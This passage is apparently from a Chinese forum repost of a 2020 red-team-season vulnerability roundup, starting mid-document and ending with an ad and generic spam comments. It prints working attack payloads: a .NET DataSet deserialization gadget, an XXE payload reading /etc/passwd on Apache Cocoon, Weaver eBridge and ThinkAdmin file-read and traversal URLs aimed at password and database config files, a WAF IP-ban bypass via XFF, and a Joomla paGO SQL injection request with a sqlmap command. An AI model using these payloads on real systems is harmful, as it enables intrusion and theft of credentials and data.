black;">msdata:IsDataSet</span>=<span style="color: black;">"true"</span> <span style="color: black;">msdata:UseCurrentLocale</span>=<span style="color: black;">"true"</span>&gt;</span> <span style="color: black;">&lt;<span style="color: black;">xs:complexType</span>&gt;</span> <span style="color: black;">&lt;<span style="color: black;">xs:choice</span> <span style="color: black;">minOccurs</span>=<span style="color: black;">"0"</span> <span style="color: black;">maxOccurs</span>=<span style="color: black;">"unbounded"</span>&gt;</span> <span style="color: black;">&lt;<span style="color: black;">xs:element</span> <span style="color: black;">name</span>=<span style="color: black;">"Exp_x0020_Table"</span>&gt;</span> <span style="color: black;">&lt;<span style="color: black;">xs:complexType</span>&gt;</span> <span style="color: black;">&lt;<span style="color: black;">xs:sequence</span>&gt;</span> <span style="color: black;">&lt;<span style="color: black;">xs:element</span> <span style="color: black;">name</span>=<span style="color: black;">"pwn"</span> <span style="color: black;">msdata:DataType</span>=<span style="color: black;">"System.Data.Services.Internal.ExpandedWrapper`2[,], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"</span> <span style="color: black;">type</span>=<span style="color: black;">"xs:anyType"</span> <span style="color: black;">minOccurs</span>=<span style="color: black;">"0"</span>/&gt;</span> <span style="color: black;">&lt;/<span style="color: black;">xs:sequence</span>&gt;</span> <span style="color: black;">&lt;/<span style="color: black;">xs:complexType</span>&gt;</span> <span style="color: black;">&lt;/<span style="color: black;">xs:element</span>&gt;</span> <span style="color: black;">&lt;/<span style="color: black;">xs:choice</span>&gt;</span> <span style="color: black;">&lt;/<span style="color: black;">xs:complexType</span>&gt;</span> <span style="color: black;">&lt;/<span style="color: black;">xs:element</span>&gt;</span> <span style="color: black;">&lt;/<span style="color: black;">xs:schema</span>&gt;</span> <span style="color: black;">&lt;<span style="color: black;">diffgr:diffgram</span> <span style="color: black;">xmlns:msdata</span>=<span style="color: black;">"urn:schemas-microsoft-com:xml-msdata"</span> <span style="color: black;">xmlns:diffgr</span>=<span style="color: black;">"urn:schemas-microsoft-com:xml-diffgram-v1"</span>&gt;</span> <span style="color: black;">&lt;<span style="color: black;">somedataset</span>&gt;</span> <span style="color: black;">&lt;<span style="color: black;">Exp_x0020_Table</span> <span style="color: black;">diffgr:id</span>=<span style="color: black;">"Exp Table1"</span> <span style="color: black;">msdata:rowOrder</span>=<span style="color: black;">"0"</span> <span style="color: black;">diffgr:hasChanges</span>=<span style="color: black;">"inserted"</span>&gt;</span> <span style="color: black;">&lt;<span style="color: black;">pwn</span> <span style="color: black;">xmlns:xsi</span>=<span style="color: black;">"http://www.w3.org/2001/XMLSchema-instance"</span> <span style="color: black;">xmlns:xsd</span>=<span style="color: black;">"http://www.w3.org/2001/XMLSchema"</span>&gt;</span> <span style="color: black;">&lt;<span style="color: black;">ExpandedElement</span>/&gt;</span> <span style="color: black;">&lt;<span style="color: black;">ProjectedProperty0</span>&gt;</span> <span style="color: black;">&lt;<span style="color: black;">MethodName</span>&gt;</span>Deserialize<span style="color: black;">&lt;/<span style="color: black;">MethodName</span>&gt;</span> <span style="color: black;">&lt;<span style="color: black;">MethodParameters</span>&gt;</span> <span style="color: black;">&lt;<span style="color: black;">anyType</span> <span style="color: black;">xmlns:xsi</span>=<span style="color: black;">"http://www.w3.org/2001/XMLSchema-instance"</span> <span style="color: black;">xmlns:xsd</span>=<span style="color: black;">"http://www.w3.org/2001/XMLSchema"</span> <span style="color: black;">xsi:type</span>=<span style="color: black;">"xsd:string"</span>&gt;</span><span style="color: black;">这儿</span>放payload<span style="color: black;">&lt;/<span style="color: black;">anyType</span>&gt;</span> <span style="color: black;">&lt;/<span style="color: black;">MethodParameters</span>&gt;</span> <span style="color: black;">&lt;<span style="color: black;">ObjectInstance</span> <span style="color: black;">xsi:type</span>=<span style="color: black;">"LosFormatter"</span>&gt;</span><span style="color: black;">&lt;/<span style="color: black;">ObjectInstance</span>&gt;</span> <span style="color: black;">&lt;/<span style="color: black;">ProjectedProperty0</span>&gt;</span> <span style="color: black;">&lt;/<span style="color: black;">pwn</span>&gt;</span> <span style="color: black;">&lt;/<span style="color: black;">Exp_x0020_Table</span>&gt;</span> <span style="color: black;">&lt;/<span style="color: black;">somedataset</span>&gt;</span> <span style="color: black;">&lt;/<span style="color: black;">diffgr:diffgram</span>&gt;</span><span style="color: black;">&lt;/<span style="color: black;">DataSet</span>&gt;</span></span><span style="color: black;"><strong style="color: blue;"><span style="color: black;">05.Apache Cocoon XML注入</span></strong></span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">漏洞利用<span style="color: black;">要求</span>有限必须是apacheCocoon且<span style="color: black;">运用</span>了StreamGenerator,<span style="color: black;">亦</span><span style="color: black;">便是</span>说只要传输的数据被解析就<span style="color: black;">能够</span>实现了。</p>
    <span style="color: black;">&lt;!--?xml version="1.0" ?--&gt;&lt;!DOCTYPE replace [&lt;!ENTITY ent SYSTEM "file:///etc/passwd"&gt; ]&gt;&lt;userInfo&gt;&lt;firstName&gt;John&lt;/firstName&gt; &lt;lastName&gt;&amp;ent;&lt;/lastName&gt;&lt;/userInfo&gt;</span><span style="color: black;"><span style="color: black;">br</span></span><span style="color: black;"><strong style="color: blue;"><span style="color: black;">06.Horde Groupware Webmail Edition 远程命令执行</span></strong></span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">源自</span>: https://srcincite.io/pocs/zdi-20-1051.py.txt</p>

    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/K9JoBxX2CgBpJXPyh5lWzcAlXIc7jJ0OeuZD1XBC3HsaKBFGW9evkYDmFV8MD51gSpSzwYyXGg5lCdzmDM2Wuw/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p><span style="color: black;"><strong style="color: blue;"><span style="color: black;">07.泛微云桥任意文件读取升级玩法</span></strong></span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">1、简单说说昨天泛微云桥的报告,输入文件路径-&gt;读取文件内容,<span style="color: black;">咱们</span>读了一下代码后<span style="color: black;">发掘</span>这还能读取文件目录。</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">2、参数不填写绝对路径写进文本内容<span style="color: black;">便是</span>当前的目录,产生了一个新的漏洞 “目录遍历”</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">/wxjsapi/saveYZJFile?fileName=test&amp;downloadUrl=file:///D:/&amp;fileExt=txt</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/K9JoBxX2CgBpJXPyh5lWzcAlXIc7jJ0O1FYsORYsoPRjZOFJuRgdZiaZWualbO4lPmfo8hwojSVqF5DaQFGn2Mg/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">3、目录遍历+文件读取,<span style="color: black;">咱们</span>能做的事情就<span style="color: black;">非常多</span>了,<span style="color: black;">例如</span>读取管理员在桌面留下的<span style="color: black;">秘码</span>文件、数据库配置文件、nginx代理配置、<span style="color: black;">拜访</span>日志、D盘迅雷下载。</p>
    <span style="color: black;">d://ebridge//tomcat//webapps//ROOT//WEB-INF//classes//init.propertiesd:/OA/tomcat8/webapps/OAMS/WEB-INF/classes/dbconfig.properties 泛微OA数据库</span><span style="color: black;"><span style="color: black;">br</span></span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/K9JoBxX2CgBpJXPyh5lWzcAlXIc7jJ0OnSZzXWwShOshMLHPuXdPgV32XteguNibZZnHb5MWKLTDwvTot8dDjLg/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p><span style="color: black;"><strong style="color: blue;"><span style="color: black;">08.某讯云WAF中修改XFF头会<span style="color: black;">引起</span>IP封禁策略失效</span></strong></span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">攻击者真实IP被封禁的<span style="color: black;">状况</span>下,还是<span style="color: black;">能够</span><span style="color: black;">经过</span>修改XFF头后继续对网站进行<span style="color: black;">拜访</span>,即IP封禁<span style="color: black;">办法</span>会无效。</span></p><span style="color: black;"><strong style="color: blue;"><span style="color: black;">09.ThinkAdmin v6 未授权列目录/任意文件读取</span></strong></span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">参考:https://github.com/zoujingli/ThinkAdmin/issues/244</span></p><span style="color: black;">任意文件读取exp:http://think.admin/ThinkAdmin/public/admin.html?s=admin/api.Update/nodePOST:rules=["/"]<span style="color: black;">亦</span><span style="color: black;">能够</span><span style="color: black;">运用</span>../来进行目录穿越:rules=["../../../"]</span><span style="color: black;"><span style="color: black;">br</span></span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/K9JoBxX2CgBpJXPyh5lWzcAlXIc7jJ0OT6nGYwBgV3Opuk2fg2ju2xncu8PGSMSrs6WxZBoS2JPFMLtO0RtibFw/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p><span style="color: black;">有一个<span style="color: black;">准许</span>的列表:configpublic/staticpublic/router.phppublic/index.phpapp/adminapp/wechat<span style="color: black;">亦</span><span style="color: black;">便是</span>说$name必须要不是database.php且要在<span style="color: black;">准许</span>列表内的文件<span style="color: black;">才可</span>够被读取,先绕过安全列表的限制,<span style="color: black;">例如</span>读取根目录的<span style="color: black;">1.</span>txt,只需要传入:<span style="color: black;">public</span>/<span style="color: black;">static</span>/../../<span style="color: black;">1.</span>txt而database.php的限制在Linux下应该是没办法绕过的,<span style="color: black;">然则</span>在Windows下<span style="color: black;">能够</span>透过<span style="color: black;">"来替换.,<span style="color: black;">亦</span><span style="color: black;">便是</span>传入:public/static/../../config/database"</span>php对应encode()后的结果为:<span style="color: black;">34392</span>q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34</span><span style="color: black;">br</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/K9JoBxX2CgBpJXPyh5lWzcAlXIc7jJ0OQh68zjrJCqtByJdRqibgib3zSsMrwHz4EOkOpe7P88bHcTTWz6C3ibS3Q/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p><span style="color: black;"><strong style="color: blue;"><span style="color: black;">10.Joomla! paGO Commerce 2.5.9.0 存在SQL 注入</span></strong></span><span style="color: black;"><span style="color: black;">POST /joomla/administrator/index.php?option=com_pago&amp;view=comments HTTP/1.1Host</span>: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 163Origin: http://localhostConnection: closeReferer: http://localhost/joomla/administrator/index.php?option=com_pago&amp;view=commentsCookie: 4bde113dfc9bf88a13de3b5b9eabe495=sp6rp5mqnihh2i323r57cvesoe; crisp-client%2Fsession%2F0ac26dbb-4c2f-490e-88b2-7292834ac0e9=session_a9697dd7-152d-4b1f-a324-3add3619b1e1Upgrade-Insecure-Requests: 1filter_search=&amp;limit=10&amp;filter_published=1&amp;task=&amp;controller=comments&amp;boxchecked=0&amp;filter_order=id&amp;filter_order_Dir=desc&amp;5a672ab408523f68032b7bdcd7d4bb5c=1</span><span style="color: black;"><span style="color: black;">br</span></span><span style="color: black;">
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Sqlmap poc</p>
    </span><span style="color: black;"><span style="color: black;">sqlmap</span> -r pago --dbs --risk=<span style="color: black;">3</span> --level=<span style="color: black;">5</span>--random-agent -p filter_published</span><span style="color: black;">br</span>买华为云服务器 请点击原文吧!




4zhvml8 发表于 2024-10-18 15:48:48

你的见解真是独到,让我受益匪浅。

b1gc8v 发表于 2024-10-20 14:24:31

你的话语真是温暖如春,让我心生感激。

7wu1wm0 发表于 3 天前

感谢你的精彩评论,带给我新的思考角度。
页: [1]
查看完整版本: 2020HW时期颁布漏洞总结:深信服,绿盟,天融信,泛微云显现漏洞,害处级别:危急